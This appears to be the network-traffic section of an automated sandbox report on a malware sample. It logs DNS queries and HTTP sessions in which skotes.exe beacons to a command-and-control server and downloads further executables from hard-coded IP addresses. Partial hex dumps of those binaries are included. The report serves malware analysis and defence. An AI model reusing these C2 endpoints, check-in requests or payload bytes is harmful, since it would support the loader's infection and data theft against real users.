Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		172.217.19.206	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		172.217.17.46	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		172.217.19.174	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		172.217.17.78	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		172.217.19.238	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		172.217.19.14	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000391006 CET	1.1.1.1	192.168.2.4	0x1cd	No error (0)	youtube-ui.l.google.com		142.250.181.78	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.000524998 CET	1.1.1.1	192.168.2.4	0xdf20	No error (0)	star-mini.c10r.facebook.com		157.240.196.35	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.005078077 CET	1.1.1.1	192.168.2.4	0x683	No error (0)	dyna.wikimedia.org		185.15.58.224	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.142949104 CET	1.1.1.1	192.168.2.4	0xb049	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 30, 2024 04:07:19.142949104 CET	1.1.1.1	192.168.2.4	0xb049	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 30, 2024 04:07:19.142949104 CET	1.1.1.1	192.168.2.4	0xb049	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 30, 2024 04:07:19.142949104 CET	1.1.1.1	192.168.2.4	0xb049	No error (0)	youtube-ui.l.google.com			28	IN (0x0001)	false
Nov 30, 2024 04:07:19.143404961 CET	1.1.1.1	192.168.2.4	0xe6eb	No error (0)	star-mini.c10r.facebook.com			28	IN (0x0001)	false
Nov 30, 2024 04:07:19.144485950 CET	1.1.1.1	192.168.2.4	0x8c2d	No error (0)	dyna.wikimedia.org			28	IN (0x0001)	false
Nov 30, 2024 04:07:19.283766031 CET	1.1.1.1	192.168.2.4	0x2379	No error (0)	twitter.com		104.244.42.129	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.283766031 CET	1.1.1.1	192.168.2.4	0x2379	No error (0)	twitter.com		104.244.42.65	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.283766031 CET	1.1.1.1	192.168.2.4	0x2379	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.283766031 CET	1.1.1.1	192.168.2.4	0x2379	No error (0)	twitter.com		104.244.42.1	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.345525980 CET	1.1.1.1	192.168.2.4	0xdc74	No error (0)	www.reddit.com	reddit.map.fastly.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 30, 2024 04:07:19.345525980 CET	1.1.1.1	192.168.2.4	0xdc74	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.345525980 CET	1.1.1.1	192.168.2.4	0xdc74	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.345525980 CET	1.1.1.1	192.168.2.4	0xdc74	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.345525980 CET	1.1.1.1	192.168.2.4	0xdc74	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.434864998 CET	1.1.1.1	192.168.2.4	0xb190	No error (0)	twitter.com		104.244.42.193	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.580714941 CET	1.1.1.1	192.168.2.4	0xf5ab	No error (0)	reddit.map.fastly.net		151.101.1.140	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.580714941 CET	1.1.1.1	192.168.2.4	0xf5ab	No error (0)	reddit.map.fastly.net		151.101.65.140	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.580714941 CET	1.1.1.1	192.168.2.4	0xf5ab	No error (0)	reddit.map.fastly.net		151.101.129.140	A (IP address)	IN (0x0001)	false
Nov 30, 2024 04:07:19.580714941 CET	1.1.1.1	192.168.2.4	0xf5ab	No error (0)	reddit.map.fastly.net		151.101.193.140	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49753	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:04.070736885 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Nov 30, 2024 04:06:05.447624922 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49759	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:07.073515892 CET	308	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Nov 30, 2024 04:06:08.441818953 CET	972	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 33 30 64 0d 0a 20 3c 63 3e 31 30 31 30 34 38 30 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 66 30 62 35 64 61 66 63 38 35 30 36 32 33 38 34 37 36 30 61 63 30 32 62 34 64 65 64 38 61 62 65 65 65 31 66 62 39 64 32 37 63 32 31 33 31 61 65 65 30 32 62 34 31 38 31 34 30 33 36 36 38 30 65 64 66 64 31 30 39 38 62 66 39 61 35 35 33 36 65 36 23 31 30 31 30 34 38 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 65 37 65 37 62 39 63 61 33 30 38 30 34 30 34 32 62 61 35 63 65 39 30 32 34 31 35 34 35 30 23 31 30 31 30 34 38 32 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 34 63 36 31 33 39 35 64 37 66 61 63 30 30 62 35 38 39 38 37 65 38 66 38 65 36 62 31 63 61 37 32 64 64 35 33 34 64 62 30 35 37 65 62 34 31 30 61 34 39 34 64 39 64 23 31 30 31 30 34 38 33 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 62 34 62 61 65 64 37 [TRUNCATED] Data Ascii: 30d <c>1010480001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fb9d27c2131aee02b41814036680edfd1098bf9a5536e6#1010481001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e7e7b9ca30804042ba5ce902415450#1010482001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8f8e6b1ca72dd534db057eb410a494d9d#1010483001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8fcf7b8c730804042ba5ce902415450#1010484001+++fc8f7c1ed3c0f9c30b4baed74c61395d7fac00b58987e8e4f4b2846d934f48b15eaa495c49#1010485001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb02ab5e45425197d1aa1daaa8#1010486001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbde719b5059bb01ab5e45425197d1aa1daaa8#1010487001+++b5937c1a99d5f9df0b5dafc85062384760ac02b4ded8abeee1fbc67e805545b01cf64d4a485a9592e100b7#<d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49765	31.41.244.11	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:08.565838099 CET	66	OUT	GET /files/6802601040/SxQyhJr.exe HTTP/1.1 Host: 31.41.244.11
Nov 30, 2024 04:06:09.903964043 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:09 GMT Content-Type: application/octet-stream Content-Length: 1473536 Last-Modified: Sat, 30 Nov 2024 02:41:31 GMT Connection: keep-alive ETag: "674a7b5b-167c00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 d2 79 4a 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 ec 15 00 00 8e 00 00 00 00 00 00 be 0b 16 00 00 20 00 00 00 20 16 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 16 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 0b 16 00 57 00 00 00 00 20 16 00 fe 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELyJg @ `dW H.text `.rsrc @@.relocz@BHdx\|Fs%oos}{o{((o((.s()Forpo+~:rp(#o3s4~~*j(rp~o5t"}'^bb`b``}'r nbj`bj`j`m}'f(((sf(((sf(((sf(((s*F{'d
Nov 30, 2024 04:06:09.903995037 CET	1236	IN	Data Raw: 20 ff 00 00 00 5f d2 2a 46 02 7b 27 00 00 04 1f 10 64 20 ff 00 00 00 5f d2 2a 42 02 7b 27 00 00 04 1e 64 20 ff 00 00 00 5f d2 2a 3a 02 7b 27 00 00 04 20 ff 00 00 00 5f d2 2a 1e 02 7b 27 00 00 04 2a 1e 02 73 0f 00 00 06 2a 22 0f 00 7b 27 00 00 04 Data Ascii: _F{'d _B{'d _:{' _{'s"{'F{'{'.(%J;8J;8J;8J;8}}~}}v}}}
Nov 30, 2024 04:06:09.904007912 CET	448	IN	Data Raw: 00 06 2a 6e 02 0f 01 28 a9 00 00 06 7d e9 00 00 04 02 0f 01 28 ab 00 00 06 7d ea 00 00 04 2a 3e 02 03 7d e9 00 00 04 02 04 7d ea 00 00 04 2a 92 0f 00 28 74 00 00 06 0f 01 28 a9 00 00 06 58 0f 00 28 76 00 00 06 0f 01 28 ab 00 00 06 58 73 67 00 00 Data Ascii: n(}(}>}}(t(X(v(Xsg(t(tX(v(vXsg(t(t@(v(v8.(m(t(Y(v(Ysg(t(tY(v(v
Nov 30, 2024 04:06:09.904112101 CET	1236	IN	Data Raw: 00 0a 28 43 00 00 0a 02 7c ea 00 00 04 28 39 00 00 0a 28 43 00 00 0a 28 40 00 00 0a 2a 56 02 0f 01 28 74 00 00 06 0f 01 28 76 00 00 06 28 7a 00 00 06 2a 22 02 03 28 6b 00 00 06 2a 22 02 03 28 6c 00 00 06 2a 22 02 03 28 6f 00 00 06 2a 22 02 03 28 Data Ascii: (C\|(9(C(@V(t(v(z"(k"(l"(o"(pZ}}}{"}{"}{"}((X((X((Xs((Y((
Nov 30, 2024 04:06:09.904179096 CET	1236	IN	Data Raw: 02 7c f4 00 00 04 28 3e 00 00 0a 28 43 00 00 0a 28 40 00 00 0a 2a 22 02 03 28 ae 00 00 06 2a 22 02 03 28 af 00 00 06 2a 7a 02 03 7d f7 00 00 04 02 05 7d f9 00 00 04 02 04 7d f8 00 00 04 02 0e 04 7d fa 00 00 04 2a 1e 02 7b f7 00 00 04 2a 22 02 03 Data Ascii: \|(>(C(@"("(z}}}}{"}{"}{"}{"}:{{Y:{{YFq3~(J((s{(X}{(X}
Nov 30, 2024 04:06:09.904190063 CET	448	IN	Data Raw: fe 00 00 04 02 25 7b ff 00 00 04 04 58 7d ff 00 00 04 2a 56 02 0f 01 28 57 00 00 06 0f 01 28 59 00 00 06 28 03 01 00 06 2a 8a 0f 00 28 57 00 00 06 0f 00 28 59 00 00 06 0f 01 28 95 00 00 06 0f 01 28 97 00 00 06 28 09 01 00 06 2a 32 7e e8 00 00 04 Data Ascii: %{X}V(W(Y((W(Y(((2~(:XXs{"}{"}{"}{"}{"}{"}{"}{"}*{
Nov 30, 2024 04:06:09.904630899 CET	1236	IN	Data Raw: 02 7b 1f 01 00 04 2a 1e 02 7b 38 01 00 04 2a 22 02 03 7d 38 01 00 04 2a 1e 02 7b 39 01 00 04 2a 22 02 03 7d 39 01 00 04 2a 1e 02 7b 3a 01 00 04 2a 22 02 03 7d 3a 01 00 04 2a 1e 02 7b 3b 01 00 04 2a 22 02 03 7d 3b 01 00 04 2a 1e 02 7b 3c 01 00 04 Data Ascii: {{8"}8{9"}9{:"}:{;"};{<"}<{="}={>"}>{E"}E{F"}F{G"}G{H"}H{I"}I{J"}J{K"}K
Nov 30, 2024 04:06:09.904640913 CET	224	IN	Data Raw: 3a 0a 00 00 00 7e 4f 00 00 0a 38 06 00 00 00 05 6f 85 03 00 06 28 91 02 00 06 17 28 07 00 00 2b 2a ea 02 3a 0b 00 00 00 72 4e 04 00 70 73 48 00 00 0a 7a 03 3a 0b 00 00 00 72 5a 04 00 70 73 48 00 00 0a 7a 02 6f 85 03 00 06 03 6f 85 03 00 06 28 93 Data Ascii: :~O8o((+:rNpsHz:rZpsHzoo((+:~O8o((+:~O8o:~O8o((+:~O8o:~O
Nov 30, 2024 04:06:09.904814959 CET	1236	IN	Data Raw: 0a 38 06 00 00 00 05 6f 85 03 00 06 28 a0 02 00 06 17 28 07 00 00 2b 2a ea 02 03 04 3a 0a 00 00 00 7e 4f 00 00 0a 38 06 00 00 00 04 6f 85 03 00 06 05 3a 0a 00 00 00 7e 4f 00 00 0a 38 06 00 00 00 05 6f 85 03 00 06 28 a1 02 00 06 17 28 07 00 00 2b Data Ascii: 8o((+:~O8o:~O8o((+:rpsHzo((+:rpsHzo((+:rpsHzo((+6((B((*o~O(P
Nov 30, 2024 04:06:09.904932976 CET	1236	IN	Data Raw: 6f 85 03 00 06 28 01 02 00 06 2a 36 02 6f 85 03 00 06 03 28 02 02 00 06 2a 32 02 6f 85 03 00 06 28 03 02 00 06 2a 36 02 6f 85 03 00 06 03 28 04 02 00 06 2a 4a 02 6f 85 03 00 06 28 06 02 00 06 16 28 09 00 00 2b 2a 8a 02 6f 85 03 00 06 03 3a 0a 00 Data Ascii: o(6o(2o(6o(Jo((+o:~O8o(Jo((+o:~O8o(Jo((+o:~O8o(Jo((+*o:
Nov 30, 2024 04:06:10.024194002 CET	1236	IN	Data Raw: 3e 02 0f 01 28 5a 03 00 06 17 28 0c 00 00 2b 2a 96 03 3a 0b 00 00 00 72 55 08 00 70 73 48 00 00 0a 7a 0f 00 03 6f 85 03 00 06 28 5b 03 00 06 17 28 0c 00 00 2b 2a 8a 02 3a 0b 00 00 00 72 5f 08 00 70 73 48 00 00 0a 7a 02 02 8e 69 03 28 5c 03 00 06 Data Ascii: >(Z(+:rUpsHzo([(+:r_psHzi(\(+2~O(:(c(+No(c(+B(b(+Vo(b(+9o(f8o(eNo((h6o(k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49780	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:14.778239012 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 30 34 38 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010480001&unit=246122658369
Nov 30, 2024 04:06:16.203892946 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49782	185.215.113.16	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:16.328048944 CET	55	OUT	GET /luma/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 30, 2024 04:06:17.754750967 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:17 GMT Content-Type: application/octet-stream Content-Length: 1864192 Last-Modified: Sat, 30 Nov 2024 03:04:48 GMT Connection: keep-alive ETag: "674a80d0-1c7200" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 42 33 47 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 e6 03 00 00 c2 00 00 00 00 00 00 00 c0 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 49 00 00 04 00 00 3a 9b 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 60 05 00 70 00 00 00 00 50 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 61 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PELB3GgI@I:@\`pPa @X@.rsrcPh@.idata `j@ `*pl@bioduybg/n@eaqvzvciIJ@.taggant0I"P@
Nov 30, 2024 04:06:17.754770994 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:17.754781961 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:17.754940033 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Nov 30, 2024 04:06:17.754951954 CET	1236	IN	Data Raw: 7b 59 c8 ca 5a 20 18 00 77 89 9b b1 d0 16 e5 0f 3c 0a 40 69 9e 96 f6 4e b1 a2 b7 cf 30 d6 14 81 11 99 ae 19 22 82 db 80 33 9d d9 e1 7e ef ca c8 33 4c 78 02 33 ce 99 ec 29 e3 6e 4c 6a f0 55 3e d8 e3 25 70 17 ca 19 05 0e d1 3b 2b 3c 24 a1 ba 32 49 Data Ascii: {YZ w<@iN0"3~3Lx3)nLjU>%p;+<$2I6mi71j&2b=AchkEzdNO1!\|]vQ5z({!4iKLwYZXM1u,
Nov 30, 2024 04:06:17.754961967 CET	1236	IN	Data Raw: 09 98 56 68 98 3d 84 bf 41 44 e0 ca 15 75 99 27 8c cc 22 ba 35 d1 5b 8e 07 0a 6f 2a c4 a1 ad 9f ed fa 6b ef 09 91 73 31 3b 07 52 10 0c 0c 79 10 14 c3 55 0a a3 d3 0d 3f a0 cb e1 29 74 8a aa d6 38 d2 56 c1 92 0a 29 ca 33 b8 e3 18 0d b1 bd 88 01 09 Data Ascii: Vh=ADu'"5[oks1;RyU?)t8V)3>p6.[M;r3"dIlrzJ_QOmitEh"bc$YAPHui!w";AhR^==!
Nov 30, 2024 04:06:17.754976034 CET	1236	IN	Data Raw: cd a3 59 09 4a a1 7b 0d 5a 4f 43 7b 8c e2 e2 21 1d 80 b0 f6 c6 d0 bd c7 fa c1 fe b4 74 53 c5 4e ba 58 21 46 be 8d 9f bc 8c d6 a7 9d e9 8d a7 86 f0 02 d6 1b 6a cf a8 30 ae e5 bb c6 35 0d f4 3e 6c fc 50 c1 fd 8a e5 69 e5 34 81 4d f8 8d 25 8f 54 42 Data Ascii: YJ{ZOC{!tSNX!Fj05>lPi4M%TBv~ax a2%(Md=7wsq9Xf#e&}!PMmIk24*B=PL@P1;HYO&3Ix/ w1
Nov 30, 2024 04:06:17.755254030 CET	1236	IN	Data Raw: f4 0a ed 94 40 67 41 3d b3 80 56 df a3 6f cf 18 ec 72 b1 d8 4a ca 23 50 be f5 82 c4 17 8f 95 7f 78 9d 8c a5 1b d4 a0 50 56 98 fc 4d a4 97 a1 55 dd 02 d6 6a 0c 42 1d 07 1d c9 43 f5 3d 75 cf bd fa 39 99 c7 c1 1d 5a 40 cf 48 27 61 c6 ac f3 30 a9 88 Data Ascii: @gA=VorJ#PxPVMUjBC=u9Z@H'a0y,F_5.8KjfRI#J" 8L}T9NGyT3GN1W5Btx$O+5{x&Wg_>KYn=9!xrI2!eA
Nov 30, 2024 04:06:17.755265951 CET	1236	IN	Data Raw: b2 01 f8 c3 e5 5c 7e 5f 48 c7 ae 89 cb 4e ec ac 63 ce ad b1 63 ea 5c cc 15 b8 10 3b 8c bc c5 ea 3b ed f6 06 7d cb 01 d4 2e 8d d2 d6 b8 27 95 88 4a 5c 5e 72 38 cf 9a ce 5d c7 58 cf 50 e1 d7 16 a1 35 e1 bd c4 37 f1 21 fe 0d 67 9c 1b eb 02 10 6e 39 Data Ascii: \~_HNcc\;;}.'J\^r8]XP57!gn9U4!?QCQ##!Kk)>3XdbW z8<x$2q)Qw;atkiq~m(so%7VIy@]+z3q7<$[/jWQ%4?{
Nov 30, 2024 04:06:17.755278111 CET	1236	IN	Data Raw: 1e 41 89 93 39 a1 c4 3f 00 b4 ed b6 fd 21 88 3b 2d b6 d0 e3 2e 6a 57 9f 23 46 20 b2 58 4f ea 88 f5 0d fc fc 6b 83 27 69 4e d3 cc ef 78 32 fe 0b a0 e0 d9 dd 54 71 39 5f 32 42 e6 52 9a 42 57 64 79 d3 aa 88 ef 7e 07 5e a8 4d 78 78 4d 1c e5 d1 16 39 Data Ascii: A9?!;-.jW#F XOk'iNx2Tq9_2BRBWdy~^MxxM9Lri4mt0_TIO4v?HU BQ:Yg%"/1$%5AN5KFV*5F(fxyD~gv)6\jjghm0PVvJc
Nov 30, 2024 04:06:17.874991894 CET	1236	IN	Data Raw: 2d 4a 88 74 6b ca 78 87 be b2 e4 64 b9 38 99 9a 0d b7 c1 b1 21 d1 82 b0 26 91 e2 1f 1a 0a 9a 42 51 30 65 8d b4 b4 56 e6 05 82 9f 69 c0 bc 4d 8c 00 97 9f 85 6f 20 9f c5 27 9f 97 9c 10 91 a6 67 6d d0 35 e5 1d 3c 4c 41 12 4a d5 e0 f5 70 9d 02 4d e6 Data Ascii: -Jtkxd8!&BQ0eViMo 'gm5<LAJpM=G]ye]eFJJIC~cA,j~kaE`H9#a'P7O(BMDh1@=B; EiZ7D&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49798	185.215.113.43	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:23.717406034 CET	184	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 31 30 34 38 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1010481001&unit=246122658369
Nov 30, 2024 04:06:25.099879980 CET	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49800	185.215.113.16	80	2312	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Nov 30, 2024 04:06:25.223202944 CET	56	OUT	GET /steam/random.exe HTTP/1.1 Host: 185.215.113.16
Nov 30, 2024 04:06:26.611172915 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 30 Nov 2024 03:06:26 GMT Content-Type: application/octet-stream Content-Length: 1840128 Last-Modified: Sat, 30 Nov 2024 03:04:55 GMT Connection: keep-alive ETag: "674a80d7-1c1400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ce b4 e2 38 8a d5 8c 6b 8a d5 8c 6b 8a d5 8c 6b e5 a3 27 6b 92 d5 8c 6b e5 a3 12 6b 87 d5 8c 6b e5 a3 26 6b b0 d5 8c 6b 83 ad 0f 6b 89 d5 8c 6b 83 ad 1f 6b 88 d5 8c 6b 0a ac 8d 6a 89 d5 8c 6b 8a d5 8d 6b d6 d5 8c 6b e5 a3 23 6b 98 d5 8c 6b e5 a3 11 